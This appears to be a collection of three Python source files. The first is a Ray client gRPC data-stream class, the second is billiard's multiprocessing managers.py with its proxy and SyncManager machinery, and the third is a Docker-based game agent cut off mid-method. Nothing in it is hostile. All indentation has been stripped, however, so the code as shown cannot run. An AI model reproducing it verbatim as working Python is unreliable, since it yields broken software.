|
"""This file implements a threaded stream controller to abstract a data stream
back to the ray clientserver.
"""
import logging
import queue
import threading
import grpc
from typing import Any, Callable, Dict, Optional
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
logger = logging.getLogger(__name__)
# The maximum field value for request_id -- which is also the maximum
# number of simultaneous in-flight requests.
INT32_MAX = (2**31) - 1
ResponseCallable = Callable[[ray_client_pb2.DataResponse], None]
class DataClient:
def __init__(self, channel: "grpc._channel.Channel", client_id: str,
metadata: list):
"""Initializes a thread-safe datapath over a Ray Client gRPC channel.
Args:
channel: connected gRPC channel
client_id: the generated ID representing this client
metadata: metadata to pass to gRPC requests
"""
self.channel = channel
self.request_queue = queue.Queue()
self.data_thread = self._start_datathread()
self.ready_data: Dict[int, Any] = {}
self.cv = threading.Condition()
self.lock = threading.RLock()
# NOTE: Dictionary insertion is guaranteed to complete before lookup
# and/or removal because of synchronization via the request_queue.
self.asyncio_waiting_data: Dict[int, ResponseCallable] = {}
self._req_id = 0
self._client_id = client_id
self._metadata = metadata
self._in_shutdown = False
self.data_thread.start()
def _next_id(self) -> int:
with self.lock:
self._req_id += 1
if self._req_id > INT32_MAX:
self._req_id = 1
# Responses that aren't tracked (like opportunistic releases)
# have req_id=0, so make sure we never mint such an id.
assert self._req_id != 0
return self._req_id
def _start_datathread(self) -> threading.Thread:
return threading.Thread(target=self._data_main, args=(), daemon=True)
def _data_main(self) -> None:
stub = ray_client_pb2_grpc.RayletDataStreamerStub(self.channel)
resp_stream = stub.Datapath(
iter(self.request_queue.get, None),
metadata=self._metadata,
wait_for_ready=True)
try:
for response in resp_stream:
if response.req_id == 0:
# This is not being waited for.
logger.debug(f"Got unawaited response {response}")
continue
if response.req_id in self.asyncio_waiting_data:
callback = self.asyncio_waiting_data.pop(response.req_id)
try:
callback(response)
except Exception:
logger.exception("Callback error:")
else:
with self.cv:
self.ready_data[response.req_id] = response
self.cv.notify_all()
except grpc.RpcError as e:
with self.cv:
self._in_shutdown = True
self.cv.notify_all()
if e.code() == grpc.StatusCode.CANCELLED:
# Gracefully shutting down
logger.info("Cancelling data channel")
elif e.code() in (grpc.StatusCode.UNAVAILABLE,
grpc.StatusCode.RESOURCE_EXHAUSTED):
# TODO(barakmich): The server may have
# dropped. In theory, we can retry, as per
# https://grpc.github.io/grpc/core/md_doc_statuscodes.html but
# in practice we may need to think about the correct semantics
# here.
logger.info("Server disconnected from data channel")
else:
logger.exception(
"Got Error from data channel -- shutting down:")
def close(self) -> None:
if self.request_queue is not None:
self.request_queue.put(None)
if self.data_thread is not None:
self.data_thread.join()
def _blocking_send(self, req: ray_client_pb2.DataRequest
) -> ray_client_pb2.DataResponse:
if self._in_shutdown:
raise ConnectionError(
"Request can't be sent because the data channel is "
"terminated. This is likely because the data channel "
"disconnected at some point before this request was "
"prepared.")
req_id = self._next_id()
req.req_id = req_id
self.request_queue.put(req)
data = None
with self.cv:
self.cv.wait_for(
lambda: req_id in self.ready_data or self._in_shutdown)
if self._in_shutdown:
raise ConnectionError(
"Sending request failed because the data channel "
"terminated. This is usually due to an error "
f"in handling the most recent request: {req}")
data = self.ready_data[req_id]
del self.ready_data[req_id]
return data
def _async_send(self,
req: ray_client_pb2.DataRequest,
callback: Optional[ResponseCallable] = None) -> None:
if self._in_shutdown:
raise ConnectionError(
"Request can't be sent because the data channel is "
"terminated. This is likely because the data channel "
"disconnected at some point before this request was "
"prepared.")
req_id = self._next_id()
req.req_id = req_id
if callback:
self.asyncio_waiting_data[req_id] = callback
self.request_queue.put(req)
def Init(self, request: ray_client_pb2.InitRequest,
context=None) -> ray_client_pb2.InitResponse:
datareq = ray_client_pb2.DataRequest(init=request, )
resp = self._blocking_send(datareq)
return resp.init
def PrepRuntimeEnv(self,
request: ray_client_pb2.PrepRuntimeEnvRequest,
context=None) -> ray_client_pb2.PrepRuntimeEnvResponse:
datareq = ray_client_pb2.DataRequest(prep_runtime_env=request, )
resp = self._blocking_send(datareq)
return resp.prep_runtime_env
def ConnectionInfo(self,
context=None) -> ray_client_pb2.ConnectionInfoResponse:
datareq = ray_client_pb2.DataRequest(
connection_info=ray_client_pb2.ConnectionInfoRequest())
resp = self._blocking_send(datareq)
return resp.connection_info
def GetObject(self, request: ray_client_pb2.GetRequest,
context=None) -> ray_client_pb2.GetResponse:
datareq = ray_client_pb2.DataRequest(get=request, )
resp = self._blocking_send(datareq)
return resp.get
def RegisterGetCallback(self,
request: ray_client_pb2.GetRequest,
callback: ResponseCallable,
context=None) -> None:
datareq = ray_client_pb2.DataRequest(get=request, )
self._async_send(datareq, callback)
def PutObject(self, request: ray_client_pb2.PutRequest,
context=None) -> ray_client_pb2.PutResponse:
datareq = ray_client_pb2.DataRequest(put=request, )
resp = self._blocking_send(datareq)
return resp.put
def ReleaseObject(self,
request: ray_client_pb2.ReleaseRequest,
context=None) -> None:
datareq = ray_client_pb2.DataRequest(release=request, )
self._async_send(datareq)
|
managers.py
|
#
# Module providing the `SyncManager` class for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
__all__ = ['BaseManager', 'SyncManager', 'BaseProxy', 'Token']
#
# Imports
#
import sys
import threading
import array
from traceback import format_exc
from . import util, connection
from .five import Queue, items, monotonic
from .pool import Pool
from .process import (
AuthenticationString, Process, current_process, active_children,
)
from .forking import exit, Popen
from .reduction import ForkingPickler
from .util import Finalize, error, info
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tostring())
ForkingPickler.register(array.array, reduce_array)
view_types = [type(getattr({}, name)())
for name in ('items', 'keys', 'values')]
if view_types[0] is not list: # only needed in Py3.0
def rebuild_as_list(obj):
return list, (list(obj), )
for view_type in view_types:
ForkingPickler.register(view_type, rebuild_as_list)
try:
import copyreg
except ImportError:
pass
else:
copyreg.pickle(view_type, rebuild_as_list)
#
# Type for identifying shared objects
#
class Token(object):
'''
Type to uniquely indentify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return 'Token(typeid=%r, address=%r, id=%r)' % \
(self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind == '#TRACEBACK':
assert type(result) is str
return RemoteError(result)
elif kind == '#UNSERIALIZABLE':
assert type(result) is str
return RemoteError('Unserializable message: %s\n' % result)
else:
return ValueError('Unrecognized message type')
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-' * 75 + '\n' + str(self.args[0]) + '-' * 75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if callable(func):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
assert isinstance(authkey, bytes)
self.registry = registry
self.authkey = AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.mutex = threading.RLock()
self.stop = 0
def serve_forever(self):
'''
Run the server forever
'''
current_process()._manager_server = self
try:
try:
while 1:
try:
c = self.listener.accept()
except (OSError, IOError):
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
except (KeyboardInterrupt, SystemExit):
pass
finally:
self.stop = 999
self.listener.close()
def handle_request(self, c):
'''
Handle a new connection
'''
funcname = result = request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception as exc:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
info('Failure to send message: %r', msg)
info(' ... request was %r', request)
info(' ... exception was %r', exc)
c.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.currentThread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop:
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
obj, exposed, gettypeid = id_to_obj[ident]
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' % (
methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception as exc:
msg = ('#ERROR', exc)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.currentThread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception:
send(('#UNSERIALIZABLE', repr(msg)))
except Exception as exc:
info('exception in thread serving %r',
threading.currentThread().name)
info(' ... message was %r', msg)
info(' ... exception was %r', exc)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__': fallback_str,
'__repr__': fallback_repr,
'#GETVALUE': fallback_getvalue,
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
with self.mutex:
result = []
keys = list(self.id_to_obj.keys())
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
def number_of_objects(self, c):
'''
Number of shared objects
'''
return len(self.id_to_obj) - 1 # don't count ident='0'
def shutdown(self, c):
'''
Shutdown this process
'''
try:
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
if sys.stdout != sys.__stdout__:
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
util._run_finalizers(0)
for p in active_children():
util.debug('terminating a child process of manager')
p.terminate()
for p in active_children():
util.debug('terminating a child process of manager')
p.join()
util._run_finalizers()
info('manager exiting with exitcode 0')
except:
if not error("Error while manager shutdown", exc_info=True):
import traceback
traceback.print_exc()
finally:
exit(0)
def create(self, c, typeid, *args, **kwds):
'''
Create a new shared object and return its id
'''
with self.mutex:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
assert len(args) == 1 and not kwds
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
assert type(method_to_typeid) is dict
exposed = list(exposed) + list(method_to_typeid)
# convert to string because xmlrpclib
# only has 32 bit signed integers
ident = '%x' % id(obj)
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
# increment the reference count immediately, to avoid
# this object being garbage collected before a Proxy
# object for it can be created. The caller of create()
# is responsible for doing a decref once the Proxy object
# has been created.
self.incref(c, ident)
return ident, tuple(exposed)
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.currentThread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
with self.mutex:
self.id_to_refcount[ident] += 1
def decref(self, c, ident):
with self.mutex:
assert self.id_to_refcount[ident] >= 1
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_obj[ident], self.id_to_refcount[ident]
util.debug('disposing of obj with id %r', ident)
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = {
'pickle': (connection.Listener, connection.Client),
'xmlrpclib': (connection.XmlListener, connection.XmlClient),
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle'):
if authkey is None:
authkey = current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
def __reduce__(self):
return (type(self).from_address,
(self._address, self._authkey, self._serializer))
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
assert self._state.value == State.INITIAL
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
assert self._state.value == State.INITIAL
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey,
self._state, self._Client),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create',
(typeid,) + args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
self._process.join(timeout)
def _debug_info(self):
'''
Return some info about the servers shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=0.2)
if process.is_alive():
info('manager still alive')
if hasattr(process, 'terminate'):
info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=0.1)
if process.is_alive():
info('manager still alive after terminate')
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
address = property(lambda self: self._address)
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = (
method_to_typeid or
getattr(proxytype, '_method_to_typeid_', None)
)
if method_to_typeid:
for key, value in items(method_to_typeid):
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True):
BaseProxy._mutex.acquire()
try:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
finally:
BaseProxy._mutex.release()
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
if authkey is not None:
self._authkey = AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = current_process().name
if threading.currentThread().name != 'MainThread':
name += '|' + threading.currentThread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
Try to call a method of the referrent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.currentThread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception as exc:
util.debug('... decref failed %s', exc)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.currentThread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception as exc:
# the proxy may just be for a manager which has shutdown
info('incref failed: %s', exc)
def __reduce__(self):
kwds = {}
if Popen.thread_is_spawning():
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %s>' % \
(type(self).__name__, self._token.typeid, '0x%x' % id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
If possible the shared object is returned, or otherwise a proxy for it.
'''
server = getattr(current_process(), '_manager_server', None)
if server and server.address == token.address:
return server.id_to_obj[token.id][0]
else:
incref = (
kwds.pop('incref', True) and
not getattr(current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
Return an proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec('''def %s(self, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return 'Namespace(%s)' % str.join(', ', temp)
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)' % (type(self).__name__,
self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
if sys.version_info[0] == 3:
_exposed = ('__next__', 'send', 'throw', 'close')
else:
_exposed_ = ('__next__', 'next', 'send', 'throw', 'close')
def next(self, *args):
return self._callmethod('next', args)
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True):
return self._callmethod('acquire', (blocking,))
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self):
return self._callmethod('notify')
def notify_all(self):
return self._callmethod('notify_all')
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = monotonic() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - monotonic()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__delslice__',
'__getitem__', '__getslice__', '__len__', '__mul__',
'__reversed__', '__rmul__', '__setitem__', '__setslice__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__',
)) # XXX __getslice__ and __setslice__ unneeded in Py3.0
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'has_key', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values',
))
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__', '__getslice__', '__setslice__',
)) # XXX __getslice__ and __setslice__ unneeded in Py3.0
PoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
))
PoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'starmap_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator',
}
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `billiard.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', Queue)
SyncManager.register('JoinableQueue', Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Pool', Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
|
docker_agent.py
|
'''An example docker agent.'''
import json
import time
import os
import threading
import requests
import docker
from . import BaseAgent
from .. import utility
from .. import characters
class DockerAgent(BaseAgent):
"""The Docker Agent that Connects to a Docker container where the character runs."""
def __init__(self,
docker_image,
port,
server='http://localhost',
character=characters.Bomber,
docker_client=None,
env_vars=None):
super(DockerAgent, self).__init__(character)
self._docker_image = docker_image
self._docker_client = docker_client
if not self._docker_client:
self._docker_client = docker.from_env()
self._docker_client.login(
os.getenv("PLAYGROUND_DOCKER_LOGIN"),
os.getenv("PLAYGROUND_DOCKER_PASSWORD"))
self._acknowledged = False # Becomes True when the container is ready.
self._server = server
self._port = port
self._timeout = 32
self._container = None
self._env_vars = env_vars or {}
# Pass env variables starting with DOCKER_AGENT to the container.
for key, value in os.environ.items():
if not key.startswith("DOCKER_AGENT_"):
continue
env_key = key.replace("DOCKER_AGENT_", "")
self._env_vars[env_key] = value
# Start the docker agent if it is on this computer. Otherwise, it's far
# away and we need to tell that server to start it.
if 'localhost' in server:
container_thread = threading.Thread(
target=self._run_container, daemon=True)
container_thread.start()
print("Waiting for docker agent at {}:{}...".format(server, port))
self._wait_for_docker()
else:
request_url = "{}:8000/run_container".format(server)
request_json = {
'docker_image': self._docker_image,
'env_vars': self._env_vars,
'port': port
}
requests.post(request_url, json=request_json)
waiting_thread = threading.Thread(
target=self._wait_for_docker, daemon=True)
waiting_thread.start()
def _run_container(self):
print("Starting container...")
self._container = self._docker_client.containers.run(
self._docker_image,
detach=True,
auto_remove=True,
ports={10080: self._port},
environment=self._env_vars)
for line in self._container.logs(stream=True):
print(line.decode("utf-8").strip())
def _wait_for_docker(self):
"""Wait for network service to appear. A timeout of 0 waits forever."""
timeout = self._timeout
backoff = .25
